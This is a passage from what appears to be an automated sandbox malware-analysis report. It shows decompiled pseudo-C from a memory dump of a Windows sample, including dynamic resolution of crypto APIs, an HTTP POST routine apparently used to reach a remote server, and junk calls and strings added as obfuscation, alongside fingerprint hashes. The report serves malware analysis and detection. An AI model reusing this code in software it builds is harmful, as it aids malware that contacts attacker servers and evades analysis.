							_t28 = _t28 << 0x00000008 |  *(_t37 + _t25 - 0x10) & 0x000000ff;
							_t25 = _t25 + 1;
						} while (_t25 < 4);
						 *_a4 = _t28;
						_t17 = 0;
						goto L11;
					}
					goto L7;
				}
				return  &(_t14->i);
			}

0x00edfc1d
0x00edfc27
0x00edfc2d
0x00edfc31
0x00edfc46
0x00edfc48
0x00edfc4d
0x00edfc9b
0x00edfc9d
0x00edfcbb
0x00000000
0x00edfcbb
0x00edfc55
0x00edfc57
0x00edfc5c
0x00000000
0x00000000
0x00edfc66
0x00edfc6a
0x00000000
0x00000000
0x00edfc6c
0x00edfc71
0x00edfc73
0x00edfc75
0x00edfc7a
0x00edfc80
0x00000000
0x00000000
0x00edfc8b
0x00edfc95
0x00edfc99
0x00edfca0
0x00edfca2
0x00edfca4
0x00edfcac
0x00edfcae
0x00edfcaf
0x00edfcb7
0x00edfcb9
0x00000000
0x00edfcb9
0x00000000
0x00edfc99
0x00000000

APIs

GetModuleHandleA.KERNEL32(advapi32.dll,0000000C,?,00EFF9B8,?), ref: 00EDFC27
GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 00EDFC46
GetProcAddress.KERNEL32(00000000,CryptGenRandom), ref: 00EDFC55
GetProcAddress.KERNEL32(00000000,CryptReleaseContext), ref: 00EDFC64

Strings

CryptReleaseContext, xrefs: 00EDFC5E
CryptAcquireContextA, xrefs: 00EDFC40
CryptGenRandom, xrefs: 00EDFC4F
advapi32.dll, xrefs: 00EDFC22

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$HandleModule
String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
API String ID: 667068680-129414566
Opcode ID: 0687c3d9be461396af5d5d88daac9396229eac3481dbe5877f9f4705826e0686
Instruction ID: 81761baa1ab5769a167684d57301aca3445f4410f2e3d98d5c5351049558bd94
Opcode Fuzzy Hash: 0687c3d9be461396af5d5d88daac9396229eac3481dbe5877f9f4705826e0686
Instruction Fuzzy Hash: 7611C832A6031D7BDF11DBB84C05BAEBAB8DB84745F201476F907F2280DA70DA429B58

Uniqueness

Uniqueness Score: -1.00%

Function 00ED241A, Relevance: 13.8, APIs: 8, Strings: 1, Instructions: 276
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E00ED241A(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr* _a24, intOrPtr _a28) {
				void* _v12;
				int _v16;
				int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				intOrPtr _v36;
				char _v40;
				intOrPtr _v44;
				int _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				char _v68;
				intOrPtr _v80;
				char* _v84;
				intOrPtr _v104;
				intOrPtr _v108;
				char* _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				char* _v124;
				void _v128;
				char _v144;
				void _v399;
				char _v400;
				void _v655;
				char _v656;
				void* __esi;
				intOrPtr _t125;
				intOrPtr _t133;
				intOrPtr* _t136;
				char _t138;
				intOrPtr _t139;
				intOrPtr _t142;
				intOrPtr _t145;
				intOrPtr _t148;
				intOrPtr _t151;
				char _t152;
				intOrPtr _t155;
				char _t158;
				void* _t159;
				intOrPtr _t160;
				intOrPtr _t167;
				signed int _t169;
				intOrPtr _t175;
				intOrPtr _t178;
				intOrPtr _t180;
				intOrPtr _t184;
				intOrPtr _t186;
				intOrPtr _t188;
				void* _t197;
				void* _t202;
				void* _t207;
				char _t208;
				signed int _t210;
				void _t212;
				int _t213;
				intOrPtr _t215;
				intOrPtr _t216;
				void* _t217;

				_t207 = __edx;
				_t208 = 4;
				_v32 = _t208;
				_v40 = 0;
				_v36 = 1;
				_v12 = 0;
				_v20 = 0;
				_v400 = 0;
				memset( &_v399, 0, 0xff);
				_v656 = 0;
				memset( &_v655, 0, 0xff);
				_v68 = E00ED3A6B();
				_v64 = E00ED3A6B();
				_v60 = E00ED3A6B();
				_v56 = E00ED3A6B();
				_t125 = E00ED3A6B();
				_t212 = 0x3c;
				_v52 = _t125;
				_v48 = 0;
				memset( &_v128, 0, 0xff);
				_v124 =  &_v144;
				_v112 =  &_v400;
				_v108 = 0x100;
				_v80 = 0x100;
				_push( &_v128);
				_push(0);
				_v120 = 0x10;
				_v84 =  &_v656;
				_v128 = _t212;
				_push(E00ECFE78(_a4));
				_push(_a4);
				_t133 =  *0xef56a4; // 0x520fcf8
				if( *((intOrPtr*)(_t133 + 0x28))() != 0) {
					_v28 = 0;
					do {
						_t136 =  *0xef56a4; // 0x520fcf8
						_v24 = 0x8404f700;
						_t213 =  *_t136( *0xef576c,  *((intOrPtr*)(_t217 + _v28 * 4 - 0x24)), 0, 0, 0);
						_v16 = _t213;
						if(_t213 != 0) {
							_t138 = 3;
							_t201 =  &_v12;
							_v12 = _t138;
							_t139 =  *0xef56a4; // 0x520fcf8
							 *((intOrPtr*)(_t139 + 0x14))(_t213, _t138,  &_v12, _t208);
							_t142 =  *0xef56a4; // 0x520fcf8
							_v12 = 0x3a98;
							 *((intOrPtr*)(_t142 + 0x14))(_t213, 2,  &_v12, _t208);
							_t145 =  *0xef56a4; // 0x520fcf8
							_v12 = 0x493e0;
							 *((intOrPtr*)(_t145 + 0x14))(_v16, 6,  &_v12, _t208);
							_t148 =  *0xef56a4; // 0x520fcf8
							_v12 = 0x493e0;
							 *((intOrPtr*)(_t148 + 0x14))(_v16, 5,  &_v12, _t208);
							_t151 =  *0xef56a4; // 0x520fcf8
							_t152 =  *((intOrPtr*)(_t151 + 0x1c))(_v16,  &_v400, _v104, 0, 0, 3, 0, 0);
							_t215 = _a28;
							_v12 = _t152;
							if(_t215 != 0) {
								E00ECE0AF( &_v12, _t207, _t215);
							}
							if(_v12 != 0) {
								if(_v116 == _t208) {
									_v24 = 0x8484f700;
								}
								_t155 =  *0xef56a4; // 0x520fcf8
								_v20 =  *((intOrPtr*)(_t155 + 0x20))(_v12, "POST",  &_v656, 0, 0,  &_v68, _v24, 0);
								if(_t215 != 0) {
									E00ECE0AF(_t201, _t207, _t215);
								}
								if(_v20 != 0) {
									if(_v116 == _t208) {
										E00ED281B(_t201, _v20);
									}
									_t158 = E00ED3A6B();
									_push(_a12);
									_v24 = _t158;
									_push(_a8);
									_t159 = E00ECFE78(_t158);
									_pop(_t202);
									_t160 =  *0xef56a4; // 0x520fcf8
									_v44 =  *((intOrPtr*)(_t160 + 0x24))(_v20, _v24, _t159);
									E00ED02B3( &_v24);
									if(_t215 != 0) {
										E00ECE0AF(_t202, _t207, _t215);
									}
									if(_v44 != 0) {
										break;
									} else {
										GetLastError();
										_t184 =  *0xef56a4; // 0x520fcf8
										 *((intOrPtr*)(_t184 + 8))(_v20);
										_v20 = 0;
										goto L21;
									}
								} else {
									GetLastError();
									L21:
									_t186 =  *0xef56a4; // 0x520fcf8
									 *((intOrPtr*)(_t186 + 8))(_v12);
									_v12 = 0;
									goto L22;
								}
							} else {
								GetLastError();
								L22:
								_t188 =  *0xef56a4; // 0x520fcf8
								 *((intOrPtr*)(_t188 + 8))(_v16);
								_v16 = 0;
								goto L23;
							}
						}
						GetLastError();
						L23:
						_v28 = _v28 + 1;
					} while (_v28 < 2);
					if(_v20 != 0) {
						_t216 = _v20;
						asm("stosd");
						asm("stosd");
						_push(0);
						_push( &_v32);
						_push( &_v40);
						_t167 =  *0xef56a4; // 0x520fcf8
						_push(0x13);
						_push(_t216);
						_v32 = 8;
						if( *((intOrPtr*)(_t167 + 0xc))() != 0) {
							_t169 = E00ECE1B6( &_v40);
							if(_t169 == 0xc8) {
								 *_a24 = _t216;
								 *_a16 = _v16;
								 *_a20 = _v12;
								return 0;
							}
							_t210 =  ~_t169;
							L30:
							_t175 =  *0xef56a4; // 0x520fcf8
							 *((intOrPtr*)(_t175 + 8))(_t216);
							L31:
							if(_v12 != 0) {
								_t180 =  *0xef56a4; // 0x520fcf8
								 *((intOrPtr*)(_t180 + 8))(_v12);
							}
							if(_v16 != 0) {
								_t178 =  *0xef56a4; // 0x520fcf8
								 *((intOrPtr*)(_t178 + 8))(_v16);
							}
							return _t210;
						}
						GetLastError();
						_t210 = 0xfffffff8;
						goto L30;
					}
					_t210 = 0xfffffffe;
					goto L31;
				}
				_t197 = 0xfffffffc;
				return _t197;
			}

0x00ed241a
0x00ed2428
0x00ed2439
0x00ed243c
0x00ed243f
0x00ed2446
0x00ed2449
0x00ed244c
0x00ed2452
0x00ed2463
0x00ed2469
0x00ed247b
0x00ed2488
0x00ed2495
0x00ed24a2
0x00ed24a8
0x00ed24af
0x00ed24b1
0x00ed24b9
0x00ed24bc
0x00ed24c7
0x00ed24d0
0x00ed24db
0x00ed24de
0x00ed24e4
0x00ed24e5
0x00ed24ef
0x00ed24f6
0x00ed24f9
0x00ed2502
0x00ed2503
0x00ed2506
0x00ed2510
0x00ed251a
0x00ed251d
0x00ed2527
0x00ed2532
0x00ed253b
0x00ed253d
0x00ed2542
0x00ed2551
0x00ed2553
0x00ed2558
0x00ed255b
0x00ed2561
0x00ed2569
0x00ed2571
0x00ed2578
0x00ed2580
0x00ed258f
0x00ed2592
0x00ed259a
0x00ed25a4
0x00ed25a7
0x00ed25bd
0x00ed25c2
0x00ed25c5
0x00ed25c8
0x00ed25cd
0x00ed25cf
0x00ed25cf
0x00ed25d7
0x00ed25e7
0x00ed25e9
0x00ed25e9
0x00ed2601
0x00ed2611
0x00ed2616
0x00ed2618
0x00ed2618
0x00ed2620
0x00ed262d
0x00ed2632
0x00ed2637
0x00ed263d
0x00ed2642
0x00ed2645
0x00ed2648
0x00ed264c
0x00ed2651
0x00ed2656
0x00ed2661
0x00ed2667
0x00ed266e
0x00ed2670
0x00ed2670
0x00ed2678
0x00000000
0x00ed267a
0x00ed267a
0x00ed2683
0x00ed2688
0x00ed268b
0x00000000
0x00ed268b
0x00ed2622
0x00ed2622
0x00ed268e
0x00ed2691
0x00ed2696
0x00ed2699
0x00000000
0x00ed2699
0x00ed25d9
0x00ed25d9
0x00ed269c
0x00ed269f
0x00ed26a4
0x00ed26a7
0x00000000
0x00ed26a7
0x00ed25d7
0x00ed2544
0x00ed26aa
0x00ed26aa
0x00ed26ad
0x00ed26ba
0x00ed26c1
0x00ed26c9
0x00ed26ca
0x00ed26cb
0x00ed26cf
0x00ed26d3
0x00ed26d4
0x00ed26d9
0x00ed26db
0x00ed26dc
0x00ed26e8
0x00ed26f8
0x00ed2702
0x00ed273b
0x00ed2740
0x00ed2748
0x00000000
0x00ed274a
0x00ed2706
0x00ed2708
0x00ed2708
0x00ed270e
0x00ed2711
0x00ed2714
0x00ed2719
0x00ed271e
0x00ed271e
0x00ed2724
0x00ed2729
0x00ed272e
0x00ed272e
0x00000000
0x00ed2731
0x00ed26ea
0x00ed26f2
0x00000000
0x00ed26f2
0x00ed26be
0x00000000
0x00ed26be
0x00ed2514
0x00000000

APIs

memset.MSVCRT ref: 00ED2452
memset.MSVCRT ref: 00ED2469
memset.MSVCRT ref: 00ED24BC
GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,000007D0), ref: 00ED2544

Strings

POST, xrefs: 00ED2606

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: memset$ErrorLast
String ID: POST
API String ID: 2570506013-1814004025
Opcode ID: 26890dd39504a5e5003a1f626e704b3bccdbf31043da422ee28bd309c5b3da8e
Instruction ID: 4ba7f3f70ef05ef696cdedce638255e0977253342fe4d603dd89ac43213e1165
Opcode Fuzzy Hash: 26890dd39504a5e5003a1f626e704b3bccdbf31043da422ee28bd309c5b3da8e
Instruction Fuzzy Hash: 08B124B2900618AFDB119F99DC84AEEBBB8EF18315F10406AF615FB261D7308A45CF61

Uniqueness

Uniqueness Score: -1.00%

Function 00EC6682, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 115
filewindowthreadCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00EC6682(void* __ecx, struct HDC__* __edx, void* __fp0) {
				intOrPtr _v32;
				char _v36;
				char _v60;
				char _v64;
				void* __esi;
				intOrPtr _t14;
				void* _t15;
				void* _t18;
				void* _t19;
				char _t23;
				intOrPtr _t26;
				intOrPtr _t28;
				intOrPtr _t31;
				intOrPtr _t36;
				intOrPtr _t37;
				intOrPtr _t39;
				void* _t44;
				void* _t48;
				intOrPtr _t51;
				struct HDC__* _t52;
				char _t59;
				void* _t68;
				void* _t71;

				_t71 = __fp0;
				_t52 = __edx;
				_t44 = __ecx;
				while(1) {
					_t14 =  *0xef56c8; // 0x520f6c8
					_t15 =  *((intOrPtr*)(_t14 + 0x2c))( *0xef56f8, 0);
					if(_t15 == 0 || _t15 == 0x80) {
						break;
					}
					E00ECE0AF(_t44, _t52,  &_v36);
					_t51 =  *0xef5728; // 0x0
					_t36 =  *0xef572c; // 0x0
					_t44 = _t51 + 0x3840;
					asm("adc eax, ebx");
					_t68 = _t36 - _v32;
					if(_t68 > 0 || _t68 >= 0 && _t44 >= _v36) {
						_t31 = 0;
					} else {
						_t37 =  *0xef56c8; // 0x520f6c8
						_push(0);
						_push( *0xef5718);
						if( *((intOrPtr*)(_t37 + 0xc8))() == 0) {
							break;
						} else {
							_t39 =  *0xef56c8; // 0x520f6c8
							 *((intOrPtr*)(_t39 + 0xb4))(0x1388);
							continue;
						}
					}
					L16:
					return _t31;
				}
				E00ECE0AF(_t44, _t52, 0xef5728);
				BitBlt(0, 1, 7, 0xd, 0x3a, 0, 0x5c, 0x5a, 0x1f);
				_t18 = GetCurrentProcess();
				_t19 = GetCurrentThread();
				DuplicateHandle(GetCurrentProcess(), _t19, _t18, 0xef5718, 0, 0, 2);
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t23 =  *0xef5724; // 0x520fc50
				_v64 = _t23;
				_t59 = E00EC5FF4(_t52, _t71,  &_v64, E00EC5D6F);
				__eflags = _t59;
				if(_t59 >= 0) {
					_push(0);
					_push( *0xef577c);
					_t48 = 0x27;
					E00ED19A7(_t48);
				}
				__eflags = _v60;
				if(_v60 != 0) {
					E00EC8F7E( &_v60);
				}
				_t26 =  *0xef56c8; // 0x520f6c8
				 *((intOrPtr*)(_t26 + 0x30))( *0xef5718);
				 *0xef5718 = 0;
				__eflags =  *0xef5784; // 0x0
				if(__eflags != 0) {
					 *0xef578c = 1;
				}
				_t28 =  *0xef56c8; // 0x520f6c8
				 *((intOrPtr*)(_t28 + 0x90))( *0xef56f8);
				CreateEnhMetaFileA(0, "T1z0,2kxJYiAhDZrv fDv.lu59d 1AOIu63aV2iIgpY0AXDAz0Orq1fwsyn ejhFMJv", 0, 0);
				_t31 = _t59;
				goto L16;
			}

0x00ec6682
0x00ec6682
0x00ec6682
0x00ec6690
0x00ec6690
0x00ec669c
0x00ec66a1
0x00000000
0x00000000
0x00ec66ae
0x00ec66b3
0x00ec66b9
0x00ec66be
0x00ec66c4
0x00ec66c6
0x00ec66ca
0x00ec66fc
0x00ec66d4
0x00ec66d4
0x00ec66d9
0x00ec66da
0x00ec66e8
0x00000000
0x00ec66ea
0x00ec66ea
0x00ec66f4
0x00000000
0x00ec66f4
0x00ec66e8
0x00ec67d8
0x00ec67de
0x00ec67de
0x00ec6708
0x00ec671d
0x00ec6732
0x00ec6735
0x00ec673f
0x00ec674b
0x00ec674c
0x00ec674d
0x00ec674e
0x00ec674f
0x00ec6754
0x00ec6767
0x00ec676b
0x00ec676d
0x00ec676f
0x00ec6770
0x00ec6778
0x00ec6779
0x00ec677f
0x00ec6780
0x00ec6784
0x00ec678b
0x00ec6790
0x00ec6797
0x00ec679c
0x00ec679f
0x00ec67a5
0x00ec67ab
0x00ec67ad
0x00ec67ad
0x00ec67bd
0x00ec67c2
0x00ec67d0
0x00ec67d6
0x00000000

APIs

BitBlt.GDI32(00000000,00000001,00000007,0000000D,0000003A,00000000,0000005C,0000005A,0000001F), ref: 00EC671D
GetCurrentProcess.KERNEL32(00EF5718,00000000,00000000,00000002,?,?,00000000,?,?,?,00EC5976), ref: 00EC6732
GetCurrentThread.KERNEL32 ref: 00EC6735
GetCurrentProcess.KERNEL32(00000000,?,?,00000000,?,?,?,00EC5976), ref: 00EC673C
DuplicateHandle.KERNEL32(00000000,?,?,00000000,?,?,?,00EC5976), ref: 00EC673F
CreateEnhMetaFileA.GDI32(00000000,T1z0,2kxJYiAhDZrv fDv.lu59d 1AOIu63aV2iIgpY0AXDAz0Orq1fwsyn ejhFMJv,00000000,00000000), ref: 00EC67D0

Part of subcall function 00ECE0AF: GetSystemTimeAsFileTime.KERNEL32(00EC8610,?,?,?,00EC8610,00000000), ref: 00ECE0B8
Part of subcall function 00ECE0AF: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00ECE0D8

Strings

T1z0,2kxJYiAhDZrv fDv.lu59d 1AOIu63aV2iIgpY0AXDAz0Orq1fwsyn ejhFMJv, xrefs: 00EC67CA

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: Current$FileProcessTime$CreateDuplicateHandleMetaSystemThreadUnothrow_t@std@@@__ehfuncinfo$??2@
String ID: T1z0,2kxJYiAhDZrv fDv.lu59d 1AOIu63aV2iIgpY0AXDAz0Orq1fwsyn ejhFMJv
API String ID: 522489362-1794790239
Opcode ID: 924faaca8a2569f8847bbd823165e22f26f7467e553d5c6a82ea9408feba4f27
Instruction ID: 8b3dc56a2a4bd462245a40e6c0288e5150cfa8e5a5f775ec8e447f01ca8a9399
Opcode Fuzzy Hash: 924faaca8a2569f8847bbd823165e22f26f7467e553d5c6a82ea9408feba4f27
Instruction Fuzzy Hash: FF31E072600704EFD710AF66EC89F2677E8E794355F02182AF301FA1E1C6729C49CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00EC822A, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 111
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00EC822A(char* _a4) {
				int _v8;
				long _v12;
				intOrPtr _v16;
				char _v17;
				char _v32;
				short _v96;
				void* _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t45;
				signed int _t55;
				intOrPtr _t59;
				char* _t61;
				void* _t62;
				signed int _t65;
				signed int _t66;
				signed int _t68;
				signed int _t69;
				void* _t70;

				_t61 = E00ECE0E8(_a4);
				BitBlt(0, 0x20, 0x30, 0x2b, 0xa, 0, 0x4c, 0x42, 0x3c);
				if(_t61 != 0) {
					 *_t61 = 0;
					_v12 = atol(_a4);
					_t15 = _t61 + 1; // 0x1
					_t65 = E00ECE0E8(_t15);
					__eflags = _t65;
					if(_t65 != 0) {
						_t16 = _t61 + 1; // 0x1
						 *_t65 = 0;
						_t38 = E00ECE1B6(_t16);
						_t17 = _t65 + 1; // 0x1
						_t62 = _t38;
						_t39 = E00ECE1B6(_t17);
						_t66 = 0;
						_v16 = _t39;
						__eflags =  *0xef5788; // 0x2
						if(__eflags > 0) {
							_v8 = 0;
							do {
								BitBlt(0, 0x54, 0xe, 0x12, 0x37, 0, 0x4a, 0x2a, 2);
								_t42 =  *0xef5730; // 0x51f1628
								_t59 = _v8;
								_t55 =  *(_t59 + _t42);
								__eflags = _t55;
								if(_t55 == 0) {
									goto L13;
								} else {
									__eflags = _t62 -  *((intOrPtr*)(_t59 + _t42 + 8));
									if(_t62 !=  *((intOrPtr*)(_t59 + _t42 + 8))) {
										goto L13;
									} else {
										__eflags = _v12 - _t55;
										if(_v12 == _t55) {
											_t68 = _t66 << 5;
											__eflags = _t68;
											 *((intOrPtr*)(_t68 + _t42 + 0x10)) = _v16;
											_t43 =  *0xef5730; // 0x51f1628
											 *((intOrPtr*)(_t68 + _t43 + 0x14)) = 0;
										} else {
											goto L13;
										}
									}
								}
								goto L16;
								L13:
								_v8 = _v8 + 0x20;
								_t66 = _t66 + 1;
								__eflags = _t66 -  *0xef5788; // 0x2
							} while (__eflags < 0);
						}
						L16:
						_t40 = 0;
						__eflags = 0;
					} else {
						_t40 = 0xfffffffe;
					}
				} else {
					GetLastError();
					_t45 = E00ECFE78(" 60 dgkpzDuLaOpX0f4q GlKMiUg3Wrccedv QfzQfe1tUwFAxj3rSJtkLTEQRM7xO8IQVRZ cNB G KCPfn.PrQJTA9I4ojKZCJb6Mw2VGo4VhEKdHC6PRo8e55,M8 wmpT0OYthQ sLc8gPcpmdrTyvF2Kl0vztXIDO38Hkj1ER9zk7147u4Ci.xu 09jGJAA40fnfP5.cN3zbI1jA7PrZ.huJfAe.sHWMugCAtR7.JpaBUhC9,IrcJFVLcA,BK.K yFAZz4lRLSESoH8O V68hQI.EEBdpEoaI54Izz6R FfLjw,EK6D7d .r1p6gYXIJIpNeuRLmUWqYMz5jLiPCs q7T0sdLefV0urGA.7 Gr9BOCcks01mNPtyYeitPBwVRQ3bXHhBGySRtMoyTYKCgBTr,FsUE9 ,l nisnzlP GGDBmSPQog0EmBcUe bdrAWUsbXB3tjeGTF,lYWH2tY5lKEEgA ijkQOICzGh0YkFfEZrwBE858veTMWJ1CIUUHOh0H9qL4MN MDP6aYN UE50es9uuvmn tvb by.EZ  YPlvMwYdZP u,n9sBSqk0H HIwQ4E8Q2Spaz wyYFY73D3frzFf50G 4XY.eF3oQ.dJUQUIrST4dPPH a2cz9k,xYNMk9lRPseAHLZnKHJ9Fi UD.tLVuXl .,4AAq3O pMjj8uE,JC.gk3PlZ5OFL1ZkQ8.ch7VKiW 4k4M3BjCTitc6v7Mj chZweE14UY0JGifOL2Uh,Vyo9dGFNo 2SDeEpMZk3W0cF.DtUKnXVSVPWvgEQ.DfiJ.P,kDXiTLHVVpIDEb28GIiYNjg2Z31cAJLSC3eSC9cO1lcWy6WH8u1yFygD4kCBpo02 22zX5Ww7fbaucIVnqapnqio9.z yIqtRlsZFlvIw6Pyze3XDK4CVd4WRE9sr NDYa jcwOs7uS vpyk2lkVv3oI3k28Lc8VIBsPG OpCub1IJ,er9gSOstRXmS,mTiqe,DVj9eGxBfSZaQgZ8TouyY6f6UP91DsJo 9r.sGj EU RG2fC,KihU.6 6DvL zUKoiakqclawnB yYOJQ2a3pcaORMg3XtGjV5fQYm O6Wcfmdr ZUBb FEgAIPVfFKpu r2nYvsynJdN.fl1JdZYDdTAYG8uvONBZXZ5wwK8F2nMTyAm TFl4RWKTfezUWlTEmbcXlh. 7h93Td Lq0R UWOcmAJGkibfRoMaKXriDwgstVb6ok,FVnoJzEk6B,wDU R,,B nK1FqIs 7uFAHoPhgz8l95GibOXy KvPsF,EVEOr0sBo6HPYdnTJ WG rnAh1B.dmgs decX3VmjRVWgv4oFIHDIEUv3JJmWC9,2 Q5n7 RaF,q. SAJ804e.xTfh oMmW1Mh7HKYnXJ g,mh2vF4JqI,7C2DwrJQWVyI,rZQHtyzxDmTVte0mQ XWiiO8V2vK1e nsoqK.fEmTha5n0W4gdFjXv9TrEXJelOyex4VUKqdq xm0Qqt1hMYY9 z bz6KSwk9cajS2TbB4YRt6 Jm.D o.weeO3TovRxu3PYbLU02aNxj64D  ,2fNC UjAQlij4M,6dOFFjA,iKCaJYuO  uX37uywNOVJlWND Ph8u.4riajem287nSNRT4341owMge8JYO9nM5a0Qzzpj9yp RRflkS p43wpOcRBX5ewJap2f7E7rAwJu fZZtwbnInNdJqQ1oq zqxcKck5fsO4MUAlz54SoaKKctiRQYtIjdP3Vlg Z5NQkiJEmXexQb2lWCptJ7d,D B7PBfln9zlULprMmxVKrU,9n7 pvtaEhN3NFr1KSOscHwyf0TShN6jz0,GwWLWCRkc0X7 X6lKuw1YjzdMu0PxXlb.j2HISbd57bcMSOQWSCO3 rtnAPGUNgn7E.2t,h5Zy6 bsIPH .gXsYRV8zttACdSUwmIAqf.Cngt q4Ama5.kp2GL8TXxpi7hqY0ogbsXw");
					_t69 = 0xf;
					if(_t45 <= _t69) {
						_t69 = _t45;
					}
					_v17 = 0;
					_v8 = 0;
					if(_t69 > 0) {
						do {
							_t46 = _v8;
							_t5 = _t46 + 0x42; // 0x42
							 *((char*)(_t70 + _v8 - 0x1c)) = _t5;
							_t45 = MultiByteToWideChar(0, 0,  &_v32, 0xffffffff,  &_v96, 0x20);
							_v8 = _v8 + 1;
						} while (_v8 < _t69);
					}
					_t40 = _t45 | 0xffffffff;
				}
				return _t40;
			}

0x00ec824d
0x00ec824f
0x00ec8257
0x00ec82ae
0x00ec82b6
0x00ec82ba
0x00ec82c2
0x00ec82c4
0x00ec82c6
0x00ec82cd
0x00ec82d0
0x00ec82d2
0x00ec82d7
0x00ec82da
0x00ec82dc
0x00ec82e1
0x00ec82e3
0x00ec82e6
0x00ec82ec
0x00ec82ee
0x00ec82f1
0x00ec8301
0x00ec8307
0x00ec830c
0x00ec830f
0x00ec8312
0x00ec8314
0x00000000
0x00ec8316
0x00ec8316
0x00ec831a
0x00000000
0x00ec831c
0x00ec831c
0x00ec831f
0x00ec8333
0x00ec8333
0x00ec8336
0x00ec833a
0x00ec833f
0x00000000
0x00000000
0x00000000
0x00ec831f
0x00ec831a
0x00000000
0x00ec8321
0x00ec8321
0x00ec8325
0x00ec8326
0x00ec8326
0x00ec832e
0x00ec8343
0x00ec8343
0x00ec8343
0x00ec82c8
0x00ec82ca
0x00ec82ca
0x00ec8259
0x00ec8259
0x00ec8264
0x00ec826c
0x00ec826f
0x00ec8271
0x00ec8271
0x00ec8273
0x00ec8276
0x00ec827b
0x00ec827d
0x00ec827d
0x00ec8280
0x00ec8285
0x00ec8295
0x00ec829b
0x00ec829e
0x00ec827d
0x00ec82a3
0x00ec82a3
0x00ec8349

APIs

BitBlt.GDI32(00000000,00000020,00000030,0000002B,0000000A,00000000,0000004C,00000042,0000003C), ref: 00EC824F
GetLastError.KERNEL32 ref: 00EC8259
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 00EC8295

Part of subcall function 00ECE1B6: SetLastError.KERNEL32(0000000D,00000000,00EEF83C,00ED18C8), ref: 00ECE1F1

Part of subcall function 00ECE1B6: SetLastError.KERNEL32(00000000,00000000,00EEF83C,00ED18C8), ref: 00ECE1FD

atol.MSVCRT(00EC8205), ref: 00EC82B0
BitBlt.GDI32(00000000,00000054,0000000E,00000012,00000037,00000000,0000004A,0000002A,00000002), ref: 00EC8301

Strings

60 dgkpzDuLaOpX0f4q GlKMiUg3Wrccedv QfzQfe1tUwFAxj3rSJtkLTEQRM7xO8IQVRZ cNB G KCPfn.PrQJTA9I4ojKZCJb6Mw2VGo4VhEKdHC6PRo8e55,M8 wmpT0OYthQ sLc8gPcpmdrTyvF2Kl0vztXIDO38Hkj1ER9zk7147u4Ci.xu 09jGJAA40fnfP5.cN3zbI1jA7PrZ.huJfAe.sHWMugCAtR7.JpaBUhC9,IrcJFVLcA,BK.K , xrefs: 00EC825F
, xrefs: 00EC8321

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: ErrorLast$ByteCharMultiWideatol
String ID: $ 60 dgkpzDuLaOpX0f4q GlKMiUg3Wrccedv QfzQfe1tUwFAxj3rSJtkLTEQRM7xO8IQVRZ cNB G KCPfn.PrQJTA9I4ojKZCJb6Mw2VGo4VhEKdHC6PRo8e55,M8 wmpT0OYthQ sLc8gPcpmdrTyvF2Kl0vztXIDO38Hkj1ER9zk7147u4Ci.xu 09jGJAA40fnfP5.cN3zbI1jA7PrZ.huJfAe.sHWMugCAtR7.JpaBUhC9,IrcJFVLcA,BK.K
API String ID: 1379874460-3780379532
Opcode ID: 513dfb33e56b3e63bcf30688a3bf4040eabc24443c07e6143c931806aa0d0b97
Instruction ID: 1f4613b9dc47873ccd14ca1b2491fe01d02979d9c23c1562e77c07efbd097611
Opcode Fuzzy Hash: 513dfb33e56b3e63bcf30688a3bf4040eabc24443c07e6143c931806aa0d0b97
Instruction Fuzzy Hash: 88310331A00248EFE720EFA8CB85FADBBA4EB14754F10652DF6117B2D1CA715E45CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00ECD26B, Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 110
filelibraryCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E00ECD26B(void* __edi, void* __esi) {
				WCHAR* _v8;
				char _v12;
				void _v140;
				intOrPtr _t15;
				char _t16;
				intOrPtr _t21;
				intOrPtr _t27;
				WCHAR* _t29;
				struct HINSTANCE__* _t31;
				intOrPtr _t39;
				void* _t40;
				signed char _t45;
				char* _t46;
				intOrPtr _t51;
				void* _t53;
				void* _t54;
				void* _t56;
				char* _t58;
				intOrPtr _t70;
				intOrPtr _t71;

				_t56 = __esi;
				_t53 = __edi;
				_t15 =  *0xef56a8; // 0xf00000
				_t45 =  *(_t15 + 0x1898);
				if(_t45 == 0x100 ||  *((intOrPtr*)(_t15 + 4)) >= 0xa && (_t45 & 0x00000004) != 0) {
					_push(_t56);
					_push(_t53);
					_t16 = E00ED3A82(_t45, 0xa2a);
					_t51 =  *0xef56a8; // 0xf00000
					_v12 = _t16;
					_push(E00ECEF54(0, _t51 + 0xb0, E00ECFE78(_t51 + 0xb0)));
					_push(L"%08x");
					_t54 = 0x40;
					E00ECE17D(_t54,  &_v140);
					_t21 =  *0xef56a8; // 0xf00000
					_t46 = L"SysWOW64";
					if( *((intOrPtr*)(_t21 + 0xa8)) == 0) {
						_t46 = L"System32";
					}
					_push(0);
					_push(_v12);
